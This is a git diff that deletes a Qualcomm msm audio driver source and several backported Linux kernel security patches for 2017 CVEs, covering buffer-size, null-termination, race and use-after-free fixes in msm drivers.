--			err = msm_compr_ioctl_shared(substream, cmd, &params);
--		break;
--	}
--	default:
--		err = msm_compr_ioctl_shared(substream, cmd, arg);
--	}
--bail_out:
--	return err;
--
--}
--#endif
--static int msm_compr_ioctl(struct snd_pcm_substream *substream,
--		unsigned int cmd, void *arg)
--{
--	int err = 0;
--	if (!substream) {
--		pr_err("%s: Invalid params\n", __func__);
--		return -EINVAL;
--	}
--	pr_debug("%s called with cmd = %d\n", __func__, cmd);
--	switch (cmd) {
--	case SNDRV_COMPRESS_TSTAMP: {
--		struct snd_compr_tstamp tstamp;
--		if (!arg) {
--			pr_err("%s: Invalid params Tstamp\n", __func__);
--			return -EINVAL;
--		}
--		err = msm_compr_ioctl_shared(substream, cmd, &tstamp);
--		if (err)
--			pr_err("%s: COMPRESS_TSTAMP failed rc %d\n",
--			__func__, err);
--		if (!err && copy_to_user(arg, &tstamp, sizeof(tstamp))) {
--			pr_err("%s: copytouser failed COMPRESS_TSTAMP\n",
--			__func__);
--			err = -EFAULT;
--		}
--		break;
--	}
--	case SNDRV_COMPRESS_GET_CAPS: {
--		struct snd_compr_caps cap;
--		if (!arg) {
--			pr_err("%s: Invalid params getcaps\n", __func__);
--			return -EINVAL;
--		}
--		pr_debug("SNDRV_COMPRESS_GET_CAPS\n");
--		err = msm_compr_ioctl_shared(substream, cmd, &cap);
--		if (err)
--			pr_err("%s: GET_CAPS failed rc %d\n",
--			__func__, err);
--		if (!err && copy_to_user(arg, &cap, sizeof(cap))) {
--			pr_err("%s: copytouser failed GET_CAPS\n",
--			__func__);
--			err = -EFAULT;
--		}
--		break;
--	}
--	case SNDRV_COMPRESS_SET_PARAMS: {
--		struct snd_compr_params params;
--		if (!arg) {
--			pr_err("%s: Invalid params setparam\n", __func__);
--			return -EINVAL;
--		}
--		if (copy_from_user(&params, arg,
--			sizeof(struct snd_compr_params))) {
--			pr_err("%s: SET_PARAMS\n", __func__);
--			return -EFAULT;
--		}
--		err = msm_compr_ioctl_shared(substream, cmd, &params);
--		if (err)
--			pr_err("%s: SET_PARAMS failed rc %d\n",
--			__func__, err);
--		break;
--	}
--	default:
--		err = msm_compr_ioctl_shared(substream, cmd, arg);
--	}
--	return err;
--}
--
--static int msm_compr_restart(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	struct audio_aio_write_param param;
--	struct audio_buffer *buf = NULL;
--	struct output_meta_data_st output_meta_data;
--	int time_stamp_flag = 0;
--	int buffer_length = 0;
--
--	pr_debug("%s, trigger restart\n", __func__);
--
--	if (runtime->render_flag & SNDRV_RENDER_STOPPED) {
--		buf = prtd->audio_client->port[IN].buf;
--		pr_debug("%s:writing %d bytes of buffer[%d] to dsp 2\n",
--				__func__, prtd->pcm_count, prtd->out_head);
--		pr_debug("%s:writing buffer[%d] from 0x%08x\n",
--				__func__, prtd->out_head,
--				((unsigned int)buf[0].phys
--				+ (prtd->out_head * prtd->pcm_count)));
--
--		if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE)
--			time_stamp_flag = SET_TIMESTAMP;
--		else
--			time_stamp_flag = NO_TIMESTAMP;
--		memcpy(&output_meta_data, (char *)(buf->data +
--			prtd->out_head * prtd->pcm_count),
--			COMPRE_OUTPUT_METADATA_SIZE);
--
--		buffer_length = output_meta_data.frame_size;
--		pr_debug("meta_data_length: %d, frame_length: %d\n",
--			 output_meta_data.meta_data_length,
--			 output_meta_data.frame_size);
--		pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n",
--			 output_meta_data.timestamp_msw,
--			 output_meta_data.timestamp_lsw);
--
--		param.paddr = (unsigned long)buf[0].phys
--				+ (prtd->out_head * prtd->pcm_count)
--				+ output_meta_data.meta_data_length;
--		param.len = buffer_length;
--		param.msw_ts = output_meta_data.timestamp_msw;
--		param.lsw_ts = output_meta_data.timestamp_lsw;
--		param.flags = time_stamp_flag;
--		param.uid = prtd->session_id;
--		if (q6asm_async_write(prtd->audio_client,
--					&param) < 0)
--			pr_err("%s:q6asm_async_write failed\n",
--				__func__);
--		else
--			prtd->out_head =
--				(prtd->out_head + 1) & (runtime->periods - 1);
--
--		runtime->render_flag &= ~SNDRV_RENDER_STOPPED;
--		return 0;
--	}
--	return 0;
--}
--
--static int msm_compr_volume_ctl_put(struct snd_kcontrol *kcontrol,
--				    struct snd_ctl_elem_value *ucontrol)
--{
--	int rc = 0;
--	struct snd_pcm_volume *vol = snd_kcontrol_chip(kcontrol);
--	struct snd_pcm_substream *substream =
--			 vol->pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream;
--	struct msm_audio *prtd;
--	int volume = ucontrol->value.integer.value[0];
--
--	pr_debug("%s: volume : %x\n", __func__, volume);
--	if (!substream)
--		return -ENODEV;
--	if (!substream->runtime)
--		return 0;
--	prtd = substream->runtime->private_data;
--	if (prtd)
--		rc = compressed_set_volume(prtd, volume);
--
--	return rc;
--}
--
--static int msm_compr_volume_ctl_get(struct snd_kcontrol *kcontrol,
--				  struct snd_ctl_elem_value *ucontrol)
--{
--	struct snd_pcm_volume *vol = snd_kcontrol_chip(kcontrol);
--	struct snd_pcm_substream *substream =
--			 vol->pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream;
--	struct msm_audio *prtd;
--
--	pr_debug("%s\n", __func__);
--	if (!substream)
--		return -ENODEV;
--	if (!substream->runtime)
--		return 0;
--	prtd = substream->runtime->private_data;
--	if (prtd)
--		ucontrol->value.integer.value[0] = prtd->volume;
--	return 0;
--}
--
--static int msm_compr_add_controls(struct snd_soc_pcm_runtime *rtd)
--{
--	int ret = 0;
--	struct snd_pcm *pcm = rtd->pcm;
--	struct snd_pcm_volume *volume_info;
--	struct snd_kcontrol *kctl;
--
--	dev_dbg(rtd->dev, "%s, Volume cntrl add\n", __func__);
--	ret = snd_pcm_add_volume_ctls(pcm, SNDRV_PCM_STREAM_PLAYBACK,
--				      NULL, 1, rtd->dai_link->be_id,
--				      &volume_info);
--	if (ret < 0)
--		return ret;
--	kctl = volume_info->kctl;
--	kctl->put = msm_compr_volume_ctl_put;
--	kctl->get = msm_compr_volume_ctl_get;
--	kctl->tlv.p = compr_rx_vol_gain;
--	return 0;
--}
--
--static struct snd_pcm_ops msm_compr_ops = {
--	.open	   = msm_compr_open,
--	.hw_params	= msm_compr_hw_params,
--	.close	  = msm_compr_close,
--	.ioctl	  = msm_compr_ioctl,
--	.prepare	= msm_compr_prepare,
--	.trigger	= msm_compr_trigger,
--	.pointer	= msm_compr_pointer,
--	.mmap		= msm_compr_mmap,
--	.restart	= msm_compr_restart,
--#ifdef CONFIG_COMPAT
--	.compat_ioctl   = msm_compr_compat_ioctl,
--#endif
--};
--
--static int msm_asoc_pcm_new(struct snd_soc_pcm_runtime *rtd)
--{
--	struct snd_card *card = rtd->card->snd_card;
--	int ret = 0;
--
--	if (!card->dev->coherent_dma_mask)
--		card->dev->coherent_dma_mask = DMA_BIT_MASK(32);
--
--	ret = msm_compr_add_controls(rtd);
--	if (ret)
--		pr_err("%s, kctl add failed\n", __func__);
--	return ret;
--}
--
--static struct snd_soc_platform_driver msm_soc_platform = {
--	.ops		= &msm_compr_ops,
--	.pcm_new	= msm_asoc_pcm_new,
--};
--
--static int msm_compr_probe(struct platform_device *pdev)
--{
--
--	dev_info(&pdev->dev, "%s: dev name %s\n",
--			 __func__, dev_name(&pdev->dev));
--
--	return snd_soc_register_platform(&pdev->dev,
--				   &msm_soc_platform);
--}
--
--static int msm_compr_remove(struct platform_device *pdev)
--{
--	snd_soc_unregister_platform(&pdev->dev);
--	return 0;
--}
--
--static const struct of_device_id msm_compr_dt_match[] = {
--	{.compatible = "qcom,msm-compr-dsp"},
--	{}
--};
--MODULE_DEVICE_TABLE(of, msm_compr_dt_match);
--
--static struct platform_driver msm_compr_driver = {
--	.driver = {
--		.name = "msm-compr-dsp",
--		.owner = THIS_MODULE,
--		.of_match_table = msm_compr_dt_match,
--	},
--	.probe = msm_compr_probe,
--	.remove = msm_compr_remove,
--};
--
--static int __init msm_soc_platform_init(void)
--{
--	init_waitqueue_head(&the_locks.enable_wait);
--	init_waitqueue_head(&the_locks.eos_wait);
--	init_waitqueue_head(&the_locks.write_wait);
--	init_waitqueue_head(&the_locks.read_wait);
--	init_waitqueue_head(&the_locks.flush_wait);
--
--	return platform_driver_register(&msm_compr_driver);
--}
--module_init(msm_soc_platform_init);
--
--static void __exit msm_soc_platform_exit(void)
--{
--	platform_driver_unregister(&msm_compr_driver);
--}
--module_exit(msm_soc_platform_exit);
--
--MODULE_DESCRIPTION("PCM module platform driver");
--MODULE_LICENSE("GPL v2");
-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h
-deleted file mode 100644
-index d6e3ec6..0000000
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h
-+++ /dev/null
-@@ -1,36 +0,0 @@
--/*
-- * Copyright (c) 2012, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MSM_COMPR_H
--#define _MSM_COMPR_H
--#include <sound/apr_audio-v2.h>
--#include <sound/q6asm-v2.h>
--#include <sound/compress_params.h>
--#include <sound/compress_offload.h>
--#include <sound/compress_driver.h>
--
--#include "msm-pcm-q6-v2.h"
--
--struct compr_info {
--	struct snd_compr_caps compr_cap;
--	struct snd_compr_codec_caps codec_caps;
--	struct snd_compr_params codec_param;
--};
--
--struct compr_audio {
--	struct msm_audio prtd;
--	struct compr_info info;
--	uint32_t codec;
--};
--
--#endif /*_MSM_COMPR_H*/
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9678/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9678/3.18/0001.patch
deleted file mode 100644
index 959bc8ff..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9678/3.18/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 420d0dc1b4563880f962002e8cb21e733bf074eb Mon Sep 17 00:00:00 2001
-From: Harsh Sahu <hsahu@codeaurora.org>
-Date: Fri, 21 Apr 2017 16:12:22 -0700
-Subject: [PATCH] msm: mdss: fix memcpy source and dest memory buffer size
- mismatch
-
-Currently memcpy is copying from a bigger memory size to a smaller
-memory size, which may lead to buffer overflow. This change corrects
-this issue by performing the memcopy restricted to the smaller of the
-src or dest memory buffer.
-
-Bug: 35258962
-Change-Id: Ibbe5665083799a4262d3cfbb06f94f3e35e03748
-Signed-off-by: Harsh Sahu <hsahu@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 7159d91148645..ec08626ba7765 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -119,14 +119,18 @@ static unsigned int __do_compat_ioctl_nr(unsigned int cmd32)
- static void  __copy_atomic_commit_struct(struct mdp_layer_commit  *commit,
- 	struct mdp_layer_commit32 *commit32)
- {
-+	unsigned int destSize = sizeof(commit->commit_v1.reserved);
-+	unsigned int srcSize = sizeof(commit32->commit_v1.reserved);
-+	unsigned int count = (destSize <= srcSize ? destSize : srcSize);
- 	commit->version = commit32->version;
- 	commit->commit_v1.flags = commit32->commit_v1.flags;
- 	commit->commit_v1.input_layer_cnt =
- 		commit32->commit_v1.input_layer_cnt;
- 	commit->commit_v1.left_roi = commit32->commit_v1.left_roi;
- 	commit->commit_v1.right_roi = commit32->commit_v1.right_roi;
-+
- 	memcpy(&commit->commit_v1.reserved, &commit32->commit_v1.reserved,
--		sizeof(commit32->commit_v1.reserved));
-+			count);
- }
- 
- static struct mdp_input_layer32 *__create_layer_list32(
diff --git a/Patches/Linux_CVEs/CVE-2017-9678/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9678/4.4/0002.patch
deleted file mode 100644
index 6dfb96ca..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9678/4.4/0002.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From ad8e758d30164290a71d9c59fbf7854029556a3e Mon Sep 17 00:00:00 2001
-From: Harsh Sahu <hsahu@codeaurora.org>
-Date: Fri, 21 Apr 2017 16:12:22 -0700
-Subject: msm: mdss: fix memcpy source and dest memory buffer size mismatch
-
-Currently memcpy is copying from a bigger memory size to a smaller
-memory size. This change corrects this issue by performing the
-memcopy restricted to the smaller of the src or dest memory buffer.
-
-CRs-fixed: 2028228
-Change-Id: Ibbe5665083799a4262d3cfbb06f94f3e35e03748
-Signed-off-by: Harsh Sahu <hsahu@codeaurora.org>
----
- drivers/video/fbdev/msm/mdss_compat_utils.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/fbdev/msm/mdss_compat_utils.c b/drivers/video/fbdev/msm/mdss_compat_utils.c
-index e9ba775..ba3dec2 100644
---- a/drivers/video/fbdev/msm/mdss_compat_utils.c
-+++ b/drivers/video/fbdev/msm/mdss_compat_utils.c
-@@ -119,6 +119,9 @@ static unsigned int __do_compat_ioctl_nr(unsigned int cmd32)
- static void  __copy_atomic_commit_struct(struct mdp_layer_commit  *commit,
- 	struct mdp_layer_commit32 *commit32)
- {
-+	unsigned int destSize = sizeof(commit->commit_v1.reserved);
-+	unsigned int srcSize = sizeof(commit32->commit_v1.reserved);
-+	unsigned int count = (destSize <= srcSize ? destSize : srcSize);
- 	commit->version = commit32->version;
- 	commit->commit_v1.flags = commit32->commit_v1.flags;
- 	commit->commit_v1.input_layer_cnt =
-@@ -127,7 +130,7 @@ static void  __copy_atomic_commit_struct(struct mdp_layer_commit  *commit,
- 	commit->commit_v1.right_roi = commit32->commit_v1.right_roi;
- 	commit->commit_v1.bl_level = commit32->commit_v1.bl_level;
- 	memcpy(&commit->commit_v1.reserved, &commit32->commit_v1.reserved,
--		sizeof(commit32->commit_v1.reserved));
-+		count);
- }
- 
- static struct mdp_input_layer32 *__create_layer_list32(
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9679/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9679/ANY/0001.patch
deleted file mode 100644
index 0aa2e795..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9679/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 31f54e33d88c676bedb64127b5ae0c60d06f9518 Mon Sep 17 00:00:00 2001
-From: Abir Ghosh <abirg@codeaurora.org>
-Date: Tue, 11 Apr 2017 10:01:15 +0530
-Subject: [PATCH] qbt1000: Terminate fingerprint TA name with null
-
-Terminate the string, coming from userspace and containing the name
-of fingerprint trusted app, with null character, to make sure kernel
-memory does not leak into logs
-
-Bug: 35644510
-Change-Id: I1668a64fcb6747ce3ef3b1ee6321fa5fa4a1798a
-CRs-Fixed: 2029409
-Signed-off-by: Abir Ghosh <abirg@codeaurora.org>
----
- drivers/soc/qcom/qbt1000.c | 8 +++++---
- 1 file changed, 5 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/soc/qcom/qbt1000.c b/drivers/soc/qcom/qbt1000.c
-index bd6f0e6005f31..6b3d34bc8c970 100755
---- a/drivers/soc/qcom/qbt1000.c
-+++ b/drivers/soc/qcom/qbt1000.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -803,13 +803,15 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			}
- 		}
- 
-+		app.name[MAX_NAME_SIZE - 1] = '\0';
-+
- 		/* start the TZ app */
- 		rc = qseecom_start_app(&drvdata->app_handle, app.name, app.size);
- 		if (rc == 0) {
- 			g_app_buf_size = app.size;
- 		} else {
--			dev_err(drvdata->dev, "%s: App %s failed to load\n",
--				__func__, app.name);
-+			dev_err(drvdata->dev, "%s: Fingerprint Trusted App failed to load\n",
-+				__func__);
- 			goto end;
- 		}
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-9680/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9680/ANY/0001.patch
deleted file mode 100644
index a58d2bd4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9680/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From dcd0a696c33dd3ab824151833d787f3ff90abbba Mon Sep 17 00:00:00 2001
-From: Abir Ghosh <abirg@codeaurora.org>
-Date: Tue, 11 Apr 2017 10:10:23 +0530
-Subject: qbt1000: Initialize drvdata structure before usage
-
-Fix uninitialized local variable error which might have lead to
-crash
-
-Change-Id: I3fd95cb343c3175e4190c8ebfe209399db0602a6
-CRs-Fixed: 2030137
-Signed-off-by: Abir Ghosh <abirg@codeaurora.org>
----
- drivers/soc/qcom/qbt1000.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/soc/qcom/qbt1000.c b/drivers/soc/qcom/qbt1000.c
-index b24978c..7f99c86 100644
---- a/drivers/soc/qcom/qbt1000.c
-+++ b/drivers/soc/qcom/qbt1000.c
-@@ -753,13 +753,14 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 	void __user *priv_arg = (void __user *)arg;
- 	struct qbt1000_drvdata *drvdata;
- 
-+	drvdata = file->private_data;
-+
- 	if (IS_ERR(priv_arg)) {
- 		dev_err(drvdata->dev, "%s: invalid user space pointer %lu\n",
- 			__func__, arg);
- 		return -EINVAL;
- 	}
- 
--	drvdata = file->private_data;
- 	pm_runtime_get_sync(drvdata->dev);
- 	mutex_lock(&drvdata->mutex);
- 	if (((drvdata->sensor_conn_type == SPI) && (!drvdata->clock_state)) ||
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9682/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9682/3.18/0001.patch
deleted file mode 100644
index 8d40372f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9682/3.18/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From cd821a40b76919b0815a9a7c09d0f6cf1f15a7ee Mon Sep 17 00:00:00 2001
-From: Sunil Khatri <sunilkh@codeaurora.org>
-Date: Mon, 5 Jun 2017 11:16:57 -0700
-Subject: [PATCH] msm: kgsl: Fix the race between context create and destroy
-
-Hold the context lock before updating the context id in
-param->drawctxt_id to avoid race condition between context
-creation and context destroy.
-
-Bug: 36491445
-Change-Id: Ic26d3e5b68078c02d15c38080b1a262ea4b1f7fe
-Signed-off-by: Sunil Khatri <sunilkh@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 7186ccf6b0cb3..5fce561ae971e 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1668,9 +1668,9 @@ long kgsl_ioctl_drawctxt_create(struct kgsl_device_private *dev_priv,
- 	/* Commit the pointer to the context in context_idr */
- 	write_lock(&device->context_lock);
- 	idr_replace(&device->context_idr, context, context->id);
-+	param->drawctxt_id = context->id;
- 	write_unlock(&device->context_lock);
- 
--	param->drawctxt_id = context->id;
- done:
- 	return result;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-9682/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9682/4.4/0002.patch
deleted file mode 100644
index 7c9e3a92..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9682/4.4/0002.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 1c4ddc4c7a4fcdf9371048ce01a6b0e5d2a2bae9 Mon Sep 17 00:00:00 2001
-From: Sunil Khatri <sunilkh@codeaurora.org>
-Date: Thu, 6 Apr 2017 18:28:31 +0530
-Subject: msm: kgsl: Fix the race between context create and destroy
-
-Hold the context lock before updating the context id in
-param->drawctxt_id to avoid race condition between context
-creation and context destroy.
-
-Change-Id: Ic26d3e5b68078c02d15c38080b1a262ea4b1f7fe
-Signed-off-by: Sunil Khatri <sunilkh@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 1de8e21..54f591e4 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1764,9 +1764,9 @@ long kgsl_ioctl_drawctxt_create(struct kgsl_device_private *dev_priv,
- 	/* Commit the pointer to the context in context_idr */
- 	write_lock(&device->context_lock);
- 	idr_replace(&device->context_idr, context, context->id);
-+	param->drawctxt_id = context->id;
- 	write_unlock(&device->context_lock);
- 
--	param->drawctxt_id = context->id;
- done:
- 	return result;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9684/ANY/0001.patch
deleted file mode 100644
index e18033bb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From d3d636627c8bb57a64bfadcc5d282c35d152f563 Mon Sep 17 00:00:00 2001
-From: Mayank Rana <mrana@codeaurora.org>
-Date: Thu, 28 Aug 2014 15:11:44 -0700
-Subject: [PATCH] f_qc_rndis: Check config or cdev is NULL in before accessing
-
-RNDIS control path completion handlers are getting called during
-disconnect as part of composition switch and this is leading to a
-crash. Avoid this crash, by checking, if cdev is not NULL before
-accessing.
-
-CRs-Fixed: 717035
-Bug: 35136547
-Change-Id: Id8748f963298129a403ffd6e4413476013315061
-Signed-off-by: Mayank Rana <mrana@codeaurora.org>
----
- drivers/usb/gadget/f_qc_rndis.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/f_qc_rndis.c b/drivers/usb/gadget/f_qc_rndis.c
-index 3bccfe8fc5a76..dfa3dd6ed18dd 100644
---- a/drivers/usb/gadget/f_qc_rndis.c
-+++ b/drivers/usb/gadget/f_qc_rndis.c
-@@ -552,7 +552,14 @@ static void rndis_qc_response_complete(struct usb_ep *ep,
- {
- 	struct f_rndis_qc		*rndis = req->context;
- 	int				status = req->status;
--	struct usb_composite_dev	*cdev = rndis->port.func.config->cdev;
-+	struct usb_composite_dev	*cdev;
-+
-+	if (!rndis->port.func.config || !rndis->port.func.config->cdev) {
-+		pr_err("%s(): cdev or config is NULL.\n", __func__);
-+		return;
-+	} else {
-+		cdev = rndis->port.func.config->cdev;
-+	}
- 
- 	/* after TX:
- 	 *  - USB_CDC_GET_ENCAPSULATED_RESPONSE (ep0/control)
diff --git a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-9684/ANY/0002.patch
deleted file mode 100644
index fdaba97c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0002.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 83cf9f50cda5ab3f99055242bebbcb26d96319ad Mon Sep 17 00:00:00 2001
-From: Jack Pham <jackp@codeaurora.org>
-Date: Wed, 6 Aug 2014 19:52:49 -0700
-Subject: [PATCH] usb: gadget: qc_rndis: Properly handle rndis_ipa_init failure
-
-Currently if rndis_ipa_init() fails port->func doesn't get
-removed from the configuration list, and will lead to a
-use-after-free when the calling function later tries to remove
-the function. Fix this to handle the failure gracefully and only
-call usb_add_function() if it succeeded.
-
-Bug: 35136547
-Change-Id: I2ad0dfeaea6b5b6ba1e47aad564ac052348677e6
-Signed-off-by: Jack Pham <jackp@codeaurora.org>
----
- drivers/usb/gadget/f_qc_rndis.c | 22 ++++++++++++----------
- 1 file changed, 12 insertions(+), 10 deletions(-)
-
-diff --git a/drivers/usb/gadget/f_qc_rndis.c b/drivers/usb/gadget/f_qc_rndis.c
-index dfa3dd6ed18dd..819bde5072a39 100644
---- a/drivers/usb/gadget/f_qc_rndis.c
-+++ b/drivers/usb/gadget/f_qc_rndis.c
-@@ -1206,25 +1206,27 @@ rndis_qc_bind_config_vendor(struct usb_configuration *c, u8 ethaddr[ETH_ALEN],
- 
- 	_rndis_qc = rndis;
- 
-+	if (rndis->xport == USB_GADGET_XPORT_BAM2BAM_IPA) {
-+		status = rndis_ipa_init(&rndis_ipa_params);
-+		if (status) {
-+			pr_err("%s: failed to init rndis_ipa\n", __func__);
-+			goto fail;
-+		}
-+	}
-+
- 	status = usb_add_function(c, &rndis->port.func);
- 	if (status) {
--		kfree(rndis);
-+		if (rndis->xport == USB_GADGET_XPORT_BAM2BAM_IPA)
-+			rndis_ipa_cleanup(rndis_ipa_params.private);
- 		goto fail;
- 	}
- 
- 	if (rndis->xport != USB_GADGET_XPORT_BAM2BAM_IPA)
- 		return status;
- 
--	status = rndis_ipa_init(&rndis_ipa_params);
--	if (status) {
--		pr_err("%s: failed to initialize rndis_ipa\n", __func__);
--		kfree(rndis);
--		goto fail;
--	} else {
--		pr_debug("%s: rndis_ipa successful created\n", __func__);
--		return status;
--	}
- fail:
-+  kfree(rndis);
-+  _rndis_qc = NULL;
- 	rndis_exit();
- 	return status;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-9684/ANY/0003.patch
deleted file mode 100644
index 8a596b5f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0003.patch
+++ /dev/null
@@ -1,259 +0,0 @@
-From b2fa897c8e86362946ec524ed47300164a33453d Mon Sep 17 00:00:00 2001
-From: Lena Salman <esalman@codeaurora.org>
-Date: Wed, 14 May 2014 10:59:58 +0300
-Subject: [PATCH] USB: f_qc_rndis: Prevent use-after-free for _rndis_qc
-
-Assume that there are two threads, thread1 is setting
-value of _rndis_qc variable in rndis_qc_bind_config_vendor
-function. Thread2 jumps in and get the value of _rndis_qc
-in rndis_qc_open_dev function before it is freed in
-rndis_qc_bind_config_vendor function, since rndis_ipa_init
-or usb_add_function failed. Use-after-free will happen as
-Thread2 is referencing freed objects. To prevent this
-spinlock is used where ever it is needed to protect
-_rndis_qc variable.
-
-Bug: 35136547
-Change-Id: Ib45ae14281821eeaf79419e8d177cb5d51b94df8
----
- drivers/usb/gadget/f_qc_rndis.c | 105 +++++++++++++++++++++++++++++-----------
- 1 file changed, 76 insertions(+), 29 deletions(-)
-
-diff --git a/drivers/usb/gadget/f_qc_rndis.c b/drivers/usb/gadget/f_qc_rndis.c
-index 819bde5072a39..b7f37df6921d8 100644
---- a/drivers/usb/gadget/f_qc_rndis.c
-+++ b/drivers/usb/gadget/f_qc_rndis.c
-@@ -81,7 +81,7 @@
-  */
- 
- struct f_rndis_qc {
--	struct qc_gether			port;
-+	struct qc_gether		port;
- 	u8				ctrl_id, data_id;
- 	u8				ethaddr[ETH_ALEN];
- 	u32				vendorID;
-@@ -90,8 +90,8 @@ struct f_rndis_qc {
- 	u32				max_pkt_size;
- 	const char			*manufacturer;
- 	int				config;
--	atomic_t		ioctl_excl;
--	atomic_t		open_excl;
-+	atomic_t			ioctl_excl;
-+	atomic_t			open_excl;
- 
- 	struct usb_ep			*notify;
- 	struct usb_request		*notify_req;
-@@ -101,6 +101,7 @@ struct f_rndis_qc {
- };
- 
- static struct ipa_usb_init_params rndis_ipa_params;
-+static spinlock_t rndis_lock;
- static bool rndis_ipa_supported;
- static void rndis_qc_open(struct qc_gether *geth);
- 
-@@ -548,7 +549,7 @@ static void rndis_qc_response_available(void *_rndis)
- }
- 
- static void rndis_qc_response_complete(struct usb_ep *ep,
--						struct usb_request *req)
-+					struct usb_request *req)
- {
- 	struct f_rndis_qc		*rndis = req->context;
- 	int				status = req->status;
-@@ -693,7 +694,7 @@ rndis_qc_setup(struct usb_function *f, const struct usb_ctrlrequest *ctrl)
- 
- static int rndis_qc_set_alt(struct usb_function *f, unsigned intf, unsigned alt)
- {
--	struct f_rndis_qc		*rndis = func_to_rndis_qc(f);
-+	struct f_rndis_qc	 *rndis = func_to_rndis_qc(f);
- 	struct usb_composite_dev *cdev = f->config->cdev;
- 
- 	/* we know alt == 0 */
-@@ -1033,6 +1034,7 @@ static void
- rndis_qc_unbind(struct usb_configuration *c, struct usb_function *f)
- {
- 	struct f_rndis_qc		*rndis = func_to_rndis_qc(f);
-+	unsigned long flags;
- 
- 	pr_debug("rndis_qc_unbind: free");
- 	bam_data_destroy(0);
-@@ -1051,7 +1053,10 @@ rndis_qc_unbind(struct usb_configuration *c, struct usb_function *f)
- 		rndis_ipa_supported = false;
- 	}
- 
-+	spin_lock_irqsave(&rndis_lock, flags);
- 	kfree(rndis);
-+	_rndis_qc = NULL;
-+	spin_unlock_irqrestore(&rndis_lock, flags);
- }
- 
- bool is_rndis_ipa_supported(void)
-@@ -1204,8 +1209,6 @@ rndis_qc_bind_config_vendor(struct usb_configuration *c, u8 ethaddr[ETH_ALEN],
- 	rndis->port.func.suspend = rndis_qc_suspend;
- 	rndis->port.func.resume = rndis_qc_resume;
- 
